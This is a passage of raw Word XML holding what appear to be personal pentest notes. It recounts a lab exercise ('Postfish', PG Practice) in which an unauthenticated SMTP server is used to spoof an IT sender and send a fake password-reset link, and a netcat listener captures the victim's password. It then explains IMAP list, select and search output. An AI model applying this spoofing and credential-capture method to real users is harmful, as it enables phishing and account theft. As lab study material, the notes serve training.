      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Form this, they saw </w:t>
      </w:r>
      <w:hyperlink r:id="rId839">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the one sending the email, and SMTP required no authentication, so they could send an email as </w:t>
      </w:r>
      <w:hyperlink r:id="rId840">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And so they did and inside the email they used key words like "Password", "Reset" and "Link" and put the URL of our own computer in the email to "change the password." This is because the email we got legit says that IT team will be sending links to reset password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000283F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then set up a listener on our IP for port 80 and when they clicked on the link, we got a POST request sent to our netcat listener which includes the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="939"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId841">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002841">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002842">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 list "" *</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002843">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">list "" * asks for all mailboxes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST ... INBOX = only one mailbox, named INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\HasNoChildren =</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no subfolders </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">under INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002846">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="872"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a2 OK ... = command finished successfully, with timing stat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002847">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002848">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002849">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a3 select INBOX</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select INBOX → open the INBOX folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAGS = possible message flags:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\Answered, \Flagged, \Deleted, \Seen, \Draft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PERMANENTFLAGS = flags you’re allowed to set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 EXISTS = there’s 1 email in the INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000284F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0 RECENT = no new/unread messages since last check.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002850">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDVALIDITY = mailbox identifier (used by clients to sync).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002851">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UIDNEXT 2 = the next message UID that will be assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002852">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">READ-WRITE = you have permission to modify mailbox (mark read/delete).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002853">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002854">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regarding the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a4 search all </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002855">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search all → list all message numbers in mailbox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002856">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* SEARCH 1 → message #1 is the only one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002857">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful for finding message IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002858">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002859">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ehamnm9su6hh" w:id="350"/>
      <w:bookmarkEnd w:id="350"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dealing with multiple mailboxes/folders and sub folders</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we only had one folder/mailbox which was INBOX and it has no subfolders. But, if we had multiple mailboxes/folders and they had subfolders, then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 list "" * </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">might return:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasChildren) "/" "INBOX"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "INBOX/Sales"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "INBOX/Support"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000285F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "Sent"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002860">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "Drafts"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002861">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">* LIST (\HasNoChildren) "/" "Trash"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002862">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">a1 OK LIST completed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002863">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002864">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002865">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\HasChildren = folder has subfolders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002866">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\HasNoChildren = folder does not</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002867">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"/" = hierarchy delimiter (in this case /). Some servers use . or another character.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002868">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if you see "INBOX/Sales", that’s a subfolder under INBOX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002869">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
